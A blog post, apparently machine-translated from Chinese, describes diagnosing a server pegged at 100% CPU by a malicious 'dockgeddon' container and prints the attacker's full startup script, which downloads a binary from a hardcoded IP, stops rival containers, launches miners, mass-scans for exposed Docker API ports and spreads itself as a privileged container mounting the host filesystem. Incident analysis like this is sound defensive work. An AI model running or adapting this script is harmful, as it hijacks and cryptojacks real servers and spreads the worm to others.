当前位置:网站首页>Abnormal dockgeddon causes CPU 100%
Abnormal dockgeddon causes CPU 100%
2022-06-24 16:25:00 【Zhanglinxi】
abnormal dockgeddon Lead to cpu 100%
Problem description
1, Receive the nail alarm , Prompt the machine cpu Utilization rate exceeding 90%
2, Then log in to monitor and find the corresponding machine
Is, indeed, CPU The utilization rate has reached 100% .
3, Check container monitoring to determine which container is causing the problem ( Because I am running on this machine docker)
It can also be used without container monitoring docker stats To check the resource consumption of each container .
4, Find the container in question , Discovery is not a container for our business , So I started to analyze
Analyze the problem docker
see docker The start command of , It is found that his startup is to execute an internal script
#!/bin/bash
RATE_TO_SCAN=500000
if type apt-get 2>/dev/null 1>/dev/null; then apt-get update --fix-missing 2>/dev/null 1>/dev/null; apt-get install -y wget curl jq bash masscan libpcap-dev ; fi
if type yum 2>/dev/null 1>/dev/null; then yum clean all 2>/dev/null 1>/dev/null; yum install -y wget curl jq bash masscan libpcap-devel ; fi
if ! type zgrab 2>/dev/null 1>/dev/null; then wget http://45.9.148.85/bin/zgrab -O /usr/bin/zgrab && chmod +x /usr/bin/zgrab ; fi
if ! type docker 2>/dev/null; then curl -sLk https://get.docker.com | bash ; fi
docker stop $(docker ps | grep -v 'CONTAINER' | grep -v 'tntpwner2\|b0rgdrone24\|dockgeddon' | awk '{print $1}')
clear ; echo "" ; echo ""
echo CgoKICAgICAgICBfX19fXyAgICAgICAgICAgICAgICAgICAgX19fX18gICAgX18gIF9fX19fICAgXyBfIF8gICAgICAgICAgICAgIAogICAgICAgL19fICAgXF9fXyAgX18gXyBfIF9fIF9fXy9fXyAgIFwvXCBcIFwvX18gICBcIHwgKF8pIHwgX19fX18gIF9fXyAgCiAgICAgICAgIC8gL1wvIF8gXC8gX2AgfCAnXyBgIF8gXCAvIC9cLyAgXC8gLyAgLyAvXC8gfCB8IHwgfC8gLyBfIFwvIF9ffCAKICAgICAgICAvIC8gfCAgX18vIChffCB8IHwgfCB8IHwgLyAvIC8gL1wgIC8gIC8gLyAgICB8IHwgfCAgIDwgIF9fL1xfXyBcIAogICAgICAgIFwvICAgXF9fX3xcX18sX3xffCB8X3wgfF9cLyAgXF9cIFwvICAgXC8gICAgIHxffF98X3xcX1xfX198fF9fXy8gCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIF8gICBfICAgICAgICAgICAgICBfX18gIF9fXyAgICBfXyAgICBfX18gICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICB8IHxffCB8X18gICBfX18gICAgLyBfX1wvIF8gXCAgL19fXCAgLyBfIFwgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgIHwgX198ICdfIFwgLyBfIFwgIC9fX1wvLyB8IHwgfC8gXC8vIC8gL19cLyAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgfCB8X3wgfCB8IHwgIF9fLyAvIFwvICBcIHxffCAvIF8gIFwvIC9fXFwgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgXF9ffF98IHxffFxfX198IFxfX19fXy9cX19fL1wvIFxfL1xfX19fLyAgICAgICAgICAgICAgICAgCgoKCgoK | base64 -d
sleep 6
chmod +x /usr/bin/zgrab
chmod +x /root/dockerd
chmod +x /root/TNTfeatB0RG
/root/TNTfeatB0RG
nice -n -20 /root/dockerd || /root/dockerd
dAPIpwn(){
range=$1
port=$2
rate=$3
rndstr=$(head /dev/urandom | tr -dc a-z | head -c 6 ; echo '')
eval "$rndstr"="'$(masscan $range -p$port --rate=$rate | awk '{print $6}'| zgrab --senders 200 --port $port --http='/v1.16/version' --output-file=- 2>/dev/null | grep -E 'ApiVersion|client version 1.16' | jq -r .ip)'";
for ipaddy in ${!rndstr}
do
TARGET=$ipaddy:$port
echo '##################################################'
curl -sLk http://45.9.148.85/input/da.php?vuln=$TARGET -o /dev/null
echo $TARGET
timeout -s SIGKILL 240 docker -H $TARGET run -d --net host --privileged --name dockgeddon -v /:/host mangletmpuser/dockgeddon
done
}
while true
do
RANGE=$(curl -sLk http://45.9.148.85/input/da_range.php)".0.0.0/8"
dAPIpwn $RANGE 2375 $RATE_TO_SCAN
dAPIpwn $RANGE 2376 $RATE_TO_SCAN
dAPIpwn $RANGE 2377 $RATE_TO_SCAN
dAPIpwn $RANGE 4244 $RATE_TO_SCAN
dAPIpwn $RANGE 4243 $RATE_TO_SCAN
doneTake a look at the startup script , I knew my server had been mined by others . Last in Aqua Website blog The corresponding information was found on
Moving blog content
TeamTNT in the light of Docker and Kubernetes The environment has launched a new campaign . By using managed in Docker Hub A set of container images in , An attacker can configure the wrong Docker A daemon ,Kubeflow Dashboard and Weave Scope Position as target , Use these environments to steal cloud credentials , Open the back door , Mining cryptocurrencies and launching a worm . Look for the next victim . In this blog , I will explore these container images and their design uses .
We are hacked because we expose this port to the public network .
terms of settlement
1, delete mirror
2, Shield the sensitive ports above to provide external access
边栏推荐
- [download attached] installation and simple use of Chinese version of awvs
- ThinkPHP 漏洞利用工具
- What is a framework?
- Implement Domain Driven Design - use ABP framework - domain logic & application logic
- 转置卷积详解
- 山金期货安全么?期货开户都是哪些流程?期货手续费怎么降低?
- Use Google search like a professional
- Find out the invisible assets -- use hosts collision to break through the boundary
- Problems encountered in the work of product manager
- There are potential safety hazards Land Rover recalls some hybrid vehicles
猜你喜欢

存在安全隐患 路虎召回部分混动揽运
![[interview high frequency questions] sequential DP questions with difficulty of 3/5 and direct construction](/img/32/720ffa63a90cd5d37460face3fde38.png)
[interview high frequency questions] sequential DP questions with difficulty of 3/5 and direct construction

Ps\ai and other design software pondering notes
![[go] concurrent programming channel](/img/6a/d62678467bbc6dfb6a50ae42bacc96.jpg)
[go] concurrent programming channel

C. Three displays codeforces round 485 (Div. 2)
MySQL Advanced Series: locks - locks in InnoDB

Using oasis to develop a hop by hop (I) -- Scene Building

用 Oasis 开发一个跳一跳(一)—— 场景搭建

Cap: multiple attention mechanism, interesting fine-grained classification scheme | AAAI 2021

【应用推荐】最近大火的Apifox & Apipost 上手体验与选型建议
随机推荐
[interview high frequency questions] sequential DP questions with difficulty of 3/5 and direct construction
国泰君安期货安全么?期货开户怎么开?期货手续费怎么降低?
Memo list: useful commands for ffmpeg command line tools
Pytorch transpose convolution
Introduction to new features of ECMAScript 2019 (ES10)
C. K-th Not Divisible by n(数学+思维) Codeforces Round #640 (Div. 4)
[cloud native | kubernetes chapter] Introduction to kubernetes Foundation (III)
Handling of communication failure between kuberbetes pod
A new weapon to break the memory wall has become a "hot search" in the industry! Persistent memory enables workers to play with massive data + high-dimensional models
MySQL Advanced Series: Locks - Locks in InnoDB
A memory leak caused by timeout scheduling of context and goroutine implementation
Global and Chinese markets of stainless steel barbecue ovens 2022-2028: Research Report on technology, participants, trends, market size and share
What can Lu yuanjiu Jiao buy?
【应用推荐】最近大火的Apifox & Apipost 上手体验与选型建议
Cognition and difference of service number, subscription number, applet and enterprise number (enterprise wechat)
April 30, 2021: there are residential areas on a straight line, and the post office can only be built on residential areas. Given an ordered positive array arr
转置卷积详解
ZOJ - 4104 sequence in the pocket
Applet wxss
Problems encountered in the work of product manager